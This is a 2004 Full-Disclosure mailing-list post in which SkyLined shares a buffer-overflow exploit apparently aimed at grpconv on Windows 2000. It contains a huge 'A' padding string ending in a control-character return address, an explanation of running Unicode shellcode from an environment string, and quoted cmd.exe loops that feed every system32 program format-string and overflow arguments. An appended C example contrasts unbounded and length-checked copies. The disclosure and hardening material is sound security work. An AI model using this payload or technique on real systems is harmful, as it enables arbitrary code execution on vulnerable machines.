AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A
-------------------------------

Let me know if it works (off-list) and what system you're using. I developed it on win2ken sp4.

Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, ctrl+A".
It works by installing a unicode shellcode in the environment string "!!!!!!" at 0x00010000. This should alphabetically be the first string, so the shellcode should be at 0x0001000e. I overwrite a return address (^N^A=0x0001000e). The unicode shellcode needs to know its own base address; that's why there's "^N^A" twice: the first one is used to return, the second one is popped off by the shellcode to get the base address.
Cheers,
SkyLined

----- Original Message -----
From: "Berend-Jan Wever" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-Disclosure] Test your windows OS

> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating
> system have any clue as to what they're doing? Run these commands from cmd.exe in the
> system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type
> as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most of them
> will either ignore the parameter or report an error because the parameter doesn't
> make sense... But on my win2k system I found 6 programs vulnerable to these very
> simple format string and BoF tests.... grpconv even gives EIP 0x00410041, can it be
> any easier?
>
> These are not vulnerabilities in themselves: you cannot gain access or elevate
> privileges but I just wanted to let you know that these programmers did a sloppy
> job.
>
> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
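The bug class behind the EIP 0x00410041 observation in the quoted post is an unbounded copy of a command-line argument into a fixed-size wide-character buffer: every 'A' becomes the UTF-16 code unit 0x0041, and two adjacent units read back as the 32-bit value 0x00410041 where a saved return address used to be. The following C is an added illustration written for this page; it is not grpconv's code and not code from the post. It models the Windows 16-bit code unit with uint16_t (wchar_t is 4 bytes on Linux), assumes a hypothetical 32-unit stack buffer, and shows the unbounded pattern beside a length-checked version that rejects overlong input instead of writing past the buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of a Windows UTF-16 code unit. Fixed at 16 bits so the layout
   matches what the post describes (one 'A' -> 0x0041) on any host.
   This is an assumption about the converter's internals, not its code. */
typedef uint16_t wc16;

/* Hypothetical fixed-size stack buffer; the size is an assumption. */
#define NAME_MAX 32

/* VULNERABLE pattern (illustrative; only ever called with short input
   below): widen and copy the argument until NUL with no length check.
   An argument longer than the buffer keeps writing past its end. */
void widen_copy_unbounded(wc16 *dst, const char *arg)
{
    while ((*dst++ = (wc16)(unsigned char)*arg++) != 0) {
    }
}

/* HARDENED pattern: verify the input fits (including its terminator)
   before copying. Returns 1 on success, 0 on rejection; dst is left
   untouched when the input is rejected. */
int widen_copy_checked(wc16 *dst, size_t dst_units, const char *arg)
{
    if (dst == NULL || arg == NULL || dst_units == 0) {
        return 0;
    }
    size_t n = strlen(arg);
    if (n >= dst_units) {
        return 0;   /* would overflow: refuse rather than truncate silently */
    }
    for (size_t i = 0; i < n; i++) {
        dst[i] = (wc16)(unsigned char)arg[i];
    }
    dst[n] = 0;
    return 1;
}

/* Why the crash shows EIP = 0x00410041: two adjacent widened copies of
   the fill character, read as one little-endian 32-bit value, are what a
   saved return address overwritten by the copy looks like. */
uint32_t widened_fill_as_u32(char fill)
{
    wc16 two[2] = { (wc16)(unsigned char)fill, (wc16)(unsigned char)fill };
    uint32_t v;
    memcpy(&v, two, sizeof v);   /* little-endian host assumed, as on x86 */
    return v;
}

/* How many 16-bit units an unbounded copy of `arg` would write past a
   buffer of `buf_units` units (0 when it fits, terminator included). */
size_t units_past_end(size_t buf_units, const char *arg)
{
    size_t needed = strlen(arg) + 1;
    return needed > buf_units ? needed - buf_units : 0;
}

int main(void)
{
    /* Constructed input: a run of 'A's far longer than the buffer. */
    char long_arg[200];
    memset(long_arg, 'A', sizeof long_arg - 1);
    long_arg[sizeof long_arg - 1] = '\0';

    wc16 name[NAME_MAX];
    widen_copy_unbounded(name, "Users");   /* safe: short input only */
    printf("checked copy of 199 'A's accepted: %d\n",
           widen_copy_checked(name, NAME_MAX, long_arg));
    printf("checked copy of \"Users\" accepted: %d\n",
           widen_copy_checked(name, NAME_MAX, "Users"));
    printf("fill 'A' seen as a return address: 0x%08x\n",
           (unsigned)widened_fill_as_u32('A'));
    printf("units the unbounded copy would write past a %d-unit buffer: %zu\n",
           NAME_MAX, units_past_end(NAME_MAX, long_arg));
    return 0;
}
```

The checked variant refuses rather than truncates so a caller cannot silently proceed with a mangled name; whichever policy a program picks, the length decision has to happen before the first byte is written.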
